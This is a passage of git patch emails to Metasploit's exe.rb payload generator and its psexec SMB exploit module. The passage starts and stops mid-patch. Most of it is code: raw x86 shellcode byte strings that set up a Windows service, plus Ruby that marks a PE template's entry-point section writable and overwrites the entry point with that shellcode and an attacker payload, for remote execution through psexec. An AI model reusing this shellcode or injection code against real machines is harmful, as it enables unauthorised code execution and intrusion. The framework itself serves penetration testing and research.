"\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + + "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" + + pe_header_size=0x18 + section_size=0x28 + characteristics_offset=0x24 + virtualAddress_offset=0xc + sizeOfRawData_offset=0x10 + + sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size + sections_table_offset = exe.rva_to_file_offset(sections_table_rva) + sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset) + + sections_header = [] + exe._file_header.v['NumberOfSections'].times { |i| + sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]] + } + + #look for section with entry point + sections_header.each do |sec| + virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] + sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] + characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] + if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddresssizeOfRawData + #put this section writable + characteristics|=0x80000000 + newcharacteristics = [characteristics].pack('L') + pe[sec[0],newcharacteristics.length]=newcharacteristics + end end - if not opts[:sub_method] - pe[136, 4] = [rand(0x100000000)].pack('V') - end + #put the shellcode at the entry point, overwriting template + pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code + when :dll max_length = 2048 when :exe_sub max_length = 4096 end - bo = pe.index('PAYLOAD:') - raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo + if opts[:exe_type] != :service_exe - if (code.length <= max_length) - pe[bo, code.length] = [code].pack("a*") - else - raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" - end + bo = pe.index('PAYLOAD:') + raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo + + if (code.length <= max_length) + pe[bo, code.length] = [code].pack("a*") + else + raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" + end if opts[:exe_type] == :dll mt = pe.index('MUTEX!!!') @@ -464,7 +513,7 @@ require 'msf/core/exe/segment_injector' def self.to_win32pe_service(framework, code, opts={}) # Allow the user to specify their own service EXE template - set_template_default(opts, "template_x86_windows_svc.exe") + set_template_default(opts, "template_x86_windows.exe") opts[:exe_type] = :service_exe exe_sub_method(code,opts) end diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 68badfeef6..88d59f07d6 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -152,6 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote # Disconnect from the ADMIN$ simple.disconnect("ADMIN$") else + servicename = rand_text_alpha(8) servicedescription = datastore['SERVICE_DESCRIPTION'] From 72a3e49fbb104d00e648f64f9e8082972867d891 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Sun, 17 Nov 2013 19:01:57 +0100 Subject: [PATCH 289/853] fix typo --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 485b1ef217..284ed99278 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -440,7 +440,7 @@ require 'msf/core/exe/segment_injector' virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddresssizeOfRawData + if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData #put this section writable characteristics|=0x80000000 newcharacteristics = [characteristics].pack('L') From b3fd21b98d037fc69d66eb3769cef5540557dde5 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Wed, 20 Nov 2013 22:44:19 +0100 Subject: [PATCH 290/853] Change to try to follow ruby guidelines --- lib/msf/util/exe.rb | 84 +++++++++++++++++++++++++-------------------- 1 file changed, 47 insertions(+), 37 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 284ed99278..721193d25b 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -396,60 +396,70 @@ require 'msf/core/exe/segment_injector' max_length = 8192 name = opts[:servicename] - if not name - name = Rex::Text.rand_text_alpha(7) - end - #code_service could be encoded in the future + name ||= Rex::Text.rand_text_alpha(7) + + # code_service could be encoded in the future code_service = - "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + - "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + - "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + - "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + - "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + - "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + - "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + - "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + - "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + - "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + - "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + - "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + - "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + - "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + - "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + + "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + + "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" - pe_header_size=0x18 - section_size=0x28 - characteristics_offset=0x24 - virtualAddress_offset=0xc - sizeOfRawData_offset=0x10 + pe_header_size = 0x18 + section_size = 0x28 + characteristics_offset = 0x24 + virtualAddress_offset = 0x0c + sizeOfRawData_offset = 0x10 + + sections_table_rva = + exe._dos_header.v['e_lfanew'] + + exe._file_header.v['SizeOfOptionalHeader'] + + pe_header_size - sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size sections_table_offset = exe.rva_to_file_offset(sections_table_rva) - sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset) + + sections_table_characteristics_offset = + exe.rva_to_file_offset(sections_table_rva + characteristics_offset) sections_header = [] exe._file_header.v['NumberOfSections'].times { |i| - sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]] + section_offset = sections_table_offset + (i * section_size) + sections_header << [ + sections_table_characteristics_offset + (i * section_size), + pe[section_offset,section_size] + ] } - #look for section with entry point + # look for section with entry point sections_header.each do |sec| virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData - #put this section writable - characteristics|=0x80000000 + + if (virtualAddress...virtualAddress+sizeOfRawData).include?(exe.hdr.opt.AddressOfEntryPoint) + # put this section writable + characteristics |= 0x8000_0000 newcharacteristics = [characteristics].pack('L') - pe[sec[0],newcharacteristics.length]=newcharacteristics + pe[sec[0],newcharacteristics.length] = newcharacteristics end end - #put the shellcode at the entry point, overwriting template - pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code + # put the shellcode at the entry point, overwriting template + pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length + code.length] = code_service + code when :dll max_length = 2048 From ca7a2c7a367cf3a07357ccf9b394904a6df8aae7 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Tue, 17 Dec 2013 15:31:02 +0100 Subject: [PATCH 291/853] Add string_to_pushes to use non fixed size service_name --- lib/msf/util/exe.rb | 32 +++++++++++++++++++++++--- modules/exploits/windows/smb/psexec.rb | 1 - 2 files changed, 29 insertions(+), 4 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 721193d25b..bf0ecd90d3 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -383,6 +383,27 @@ require 'msf/core/exe/segment_injector' return pe end + def self.string_to_pushes(str) + # Align string to 4 bytes + rem = (str.length) % 4 + if (rem > 0) + str << "\x00" * (4 - rem) + pushes = '' + else + pushes = "h\x00\x00\x00\x00" + end + # string is now 4 bytes aligned with null byte + + # push string to stack, starting at the back + while (str.length > 0) + four = 'h'+str.slice!(-4,4) + pushes << four + end + + pushes + end + + def self.exe_sub_method(code,opts ={}) pe = '' @@ -398,6 +419,8 @@ require 'msf/core/exe/segment_injector' name ||= Rex::Text.rand_text_alpha(7) + pushed_service_name = string_to_pushes(name) + # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -410,11 +433,11 @@ require 'msf/core/exe/segment_injector' "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + + "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + + "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" @@ -459,7 +482,10 @@ require 'msf/core/exe/segment_injector' end # put the shellcode at the entry point, overwriting template - pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length + code.length] = code_service + code + entryPoint_file_offset = exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint) + my_payload_length = code_service.length + code.length + payload_service = code_service + code + pe[entryPoint_file_offset,my_payload] = payload_service when :dll max_length = 2048 diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 88d59f07d6..68badfeef6 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -152,7 +152,6 @@ class Metasploit3 < Msf::Exploit::Remote # Disconnect from the ADMIN$ simple.disconnect("ADMIN$") else - servicename = rand_text_alpha(8) servicedescription = datastore['SERVICE_DESCRIPTION'] From 914d15c285fcc6a18a5d40c6ee3015461da22d00 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Tue, 17 Dec 2013 15:47:17 +0100 Subject: [PATCH 292/853] fix typo --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index bf0ecd90d3..6c947778cf 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -485,7 +485,7 @@ require 'msf/core/exe/segment_injector' entryPoint_file_offset = exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint) my_payload_length = code_service.length + code.length payload_service = code_service + code - pe[entryPoint_file_offset,my_payload] = payload_service + pe[entryPoint_file_offset,my_payload_length] = payload_service when :dll max_length = 2048 From 0b462ceea64aec43dc38d7b3229ccb8a3dc7eb95 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Thu, 26 Dec 2013 12:50:42 +0100 Subject: [PATCH 293/853] refactor `to_winpe_only` code to be used by `to_win32pe_service` --- lib/msf/util/exe.rb | 177 ++++++++++++++++++++------------------------ 1 file changed, 82 insertions(+), 95 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 6c947778cf..80314f3f83 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -314,25 +314,48 @@ require 'msf/core/exe/segment_injector' exe = fd.read(fd.stat.size) } + pe_header_size = 0x18 + section_size = 0x28 + characteristics_offset = 0x24 + virtualAddress_offset = 0x0c + sizeOfRawData_offset = 0x10 + + sections_table_rva = + pe._dos_header.v['e_lfanew'] + + pe._file_header.v['SizeOfOptionalHeader'] + + pe_header_size + + sections_table_offset = pe.rva_to_file_offset(sections_table_rva) + + sections_table_characteristics_offset = + pe.rva_to_file_offset(sections_table_rva + characteristics_offset) + sections_header = [] - pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] } + pe._file_header.v['NumberOfSections'].times { |i| + section_offset = sections_table_offset + (i * section_size) + sections_header << [ + sections_table_characteristics_offset + (i * section_size), + exe[section_offset,section_size] + ] + } - - #look for section with entry point + # look for section with entry point sections_header.each do |sec| - virtualAddress = sec[1][0xc,0x4].unpack('L')[0] - sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0] - characteristics = sec[1][0x24,0x4].unpack('L')[0] - if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData - #put this section writable - characteristics|=0x80000000 + virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] + sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] + characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] + + if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint) + # put this section writable + characteristics |= 0x8000_0000 newcharacteristics = [characteristics].pack('L') - exe[sec[0],newcharacteristics.length]=newcharacteristics + exe[sec[0],newcharacteristics.length] = newcharacteristics end end - #put the shellcode at the entry point, overwriting template - exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code + # put the shellcode at the entry point, overwriting template + entryPoint_file_offset = pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint) + exe[entryPoint_file_offset,code.length] = code return exe end @@ -403,7 +426,6 @@ require 'msf/core/exe/segment_injector' pushes end - def self.exe_sub_method(code,opts ={}) pe = '' @@ -413,96 +435,32 @@ require 'msf/core/exe/segment_injector' case opts[:exe_type] when :service_exe - exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) max_length = 8192 name = opts[:servicename] - name ||= Rex::Text.rand_text_alpha(7) - - pushed_service_name = string_to_pushes(name) - - # code_service could be encoded in the future - code_service = - "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + - "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + - "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + - "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + - "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + - "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + - "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + - "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + - "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + - "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + - "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + - "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + - "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + - "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + - "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" - - pe_header_size = 0x18 - section_size = 0x28 - characteristics_offset = 0x24 - virtualAddress_offset = 0x0c - sizeOfRawData_offset = 0x10 - - sections_table_rva = - exe._dos_header.v['e_lfanew'] + - exe._file_header.v['SizeOfOptionalHeader'] + - pe_header_size - - sections_table_offset = exe.rva_to_file_offset(sections_table_rva) - - sections_table_characteristics_offset = - exe.rva_to_file_offset(sections_table_rva + characteristics_offset) - - sections_header = [] - exe._file_header.v['NumberOfSections'].times { |i| - section_offset = sections_table_offset + (i * section_size) - sections_header << [ - sections_table_characteristics_offset + (i * section_size), - pe[section_offset,section_size] - ] - } - - # look for section with entry point - sections_header.each do |sec| - virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] - sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] - characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - - if (virtualAddress...virtualAddress+sizeOfRawData).include?(exe.hdr.opt.AddressOfEntryPoint) - # put this section writable - characteristics |= 0x8000_0000 - newcharacteristics = [characteristics].pack('L') - pe[sec[0],newcharacteristics.length] = newcharacteristics - end + if name + bo = pe.index('SERVICENAME') + raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo + pe[bo, 11] = [name].pack('a11') end - # put the shellcode at the entry point, overwriting template - entryPoint_file_offset = exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint) - my_payload_length = code_service.length + code.length - payload_service = code_service + code - pe[entryPoint_file_offset,my_payload_length] = payload_service - + if not opts[:sub_method] + pe[136, 4] = [rand(0x100000000)].pack('V') + end when :dll max_length = 2048 when :exe_sub max_length = 4096 end - if opts[:exe_type] != :service_exe + bo = pe.index('PAYLOAD:') + raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo - bo = pe.index('PAYLOAD:') - raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo - - if (code.length <= max_length) - pe[bo, code.length] = [code].pack("a*") - else - raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" - end + if (code.length <= max_length) + pe[bo, code.length] = [code].pack("a*") + else + raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" + end if opts[:exe_type] == :dll mt = pe.index('MUTEX!!!') @@ -548,10 +506,39 @@ require 'msf/core/exe/segment_injector' end def self.to_win32pe_service(framework, code, opts={}) - # Allow the user to specify their own service EXE template - set_template_default(opts, "template_x86_windows.exe") - opts[:exe_type] = :service_exe - exe_sub_method(code,opts) + if opts[:sub_method] + # Allow the user to specify their own service EXE template + set_template_default(opts, "template_x86_windows_svc.exe") + opts[:exe_type] = :service_exe + exe_sub_method(code,opts) + else + name = opts[:servicename] + name ||= Rex::Text.rand_text_alpha(7) + pushed_service_name = string_to_pushes(name) + + # code_service could be encoded in the future + code_service = + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + + "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + + "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" + + to_winpe_only(framework, code_service + code, opts) + end end def self.to_win64pe_service(framework, code, opts={}) From 5ecebc3427268d090a2e0dc46a308b1fb3c66b7b Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Thu, 26 Dec 2013 14:36:26 +0100 Subject: [PATCH 294/853] Add options `SERVICE_NAME` and `SERVICE_DISPLAYNAME` to psexec and correct service payload generation --- lib/msf/util/exe.rb | 45 +++++++++++++++----------- modules/exploits/windows/smb/psexec.rb | 7 ++-- 2 files changed, 32 insertions(+), 20 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 80314f3f83..e52fc625a4 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -299,7 +299,6 @@ require 'msf/core/exe/segment_injector' end def self.to_winpe_only(framework, code, opts={}, arch="x86") - if arch == ARCH_X86_64 arch = ARCH_X64 end @@ -310,9 +309,9 @@ require 'msf/core/exe/segment_injector' pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) exe = '' - File.open(opts[:template], 'rb') { |fd| - exe = fd.read(fd.stat.size) - } + File.open(opts[:template], 'rb') { |fd| + exe = fd.read(fd.stat.size) + } pe_header_size = 0x18 section_size = 0x28 @@ -356,7 +355,6 @@ require 'msf/core/exe/segment_injector' # put the shellcode at the entry point, overwriting template entryPoint_file_offset = pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint) exe[entryPoint_file_offset,code.length] = code - return exe end @@ -406,7 +404,8 @@ require 'msf/core/exe/segment_injector' return pe end - def self.string_to_pushes(str) + def self.string_to_pushes(string) + str = string.dup # Align string to 4 bytes rem = (str.length) % 4 if (rem > 0) @@ -510,12 +509,21 @@ require 'msf/core/exe/segment_injector' # Allow the user to specify their own service EXE template set_template_default(opts, "template_x86_windows_svc.exe") opts[:exe_type] = :service_exe - exe_sub_method(code,opts) + return exe_sub_method(code,opts) else name = opts[:servicename] - name ||= Rex::Text.rand_text_alpha(7) + name ||= Rex::Text.rand_text_alpha(8) pushed_service_name = string_to_pushes(name) + precode_size = 0xc6 + svcmain_code_offset = precode_size + pushed_service_name.length + + precode_size += 0x06 + hash_code_offset = precode_size + pushed_service_name.length + + precode_size -= 0x0d + svcctrlhandler_code_offset = precode_size + pushed_service_name.length + # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -528,16 +536,17 @@ require 'msf/core/exe/segment_injector' "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + - "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + - "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + - "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + - 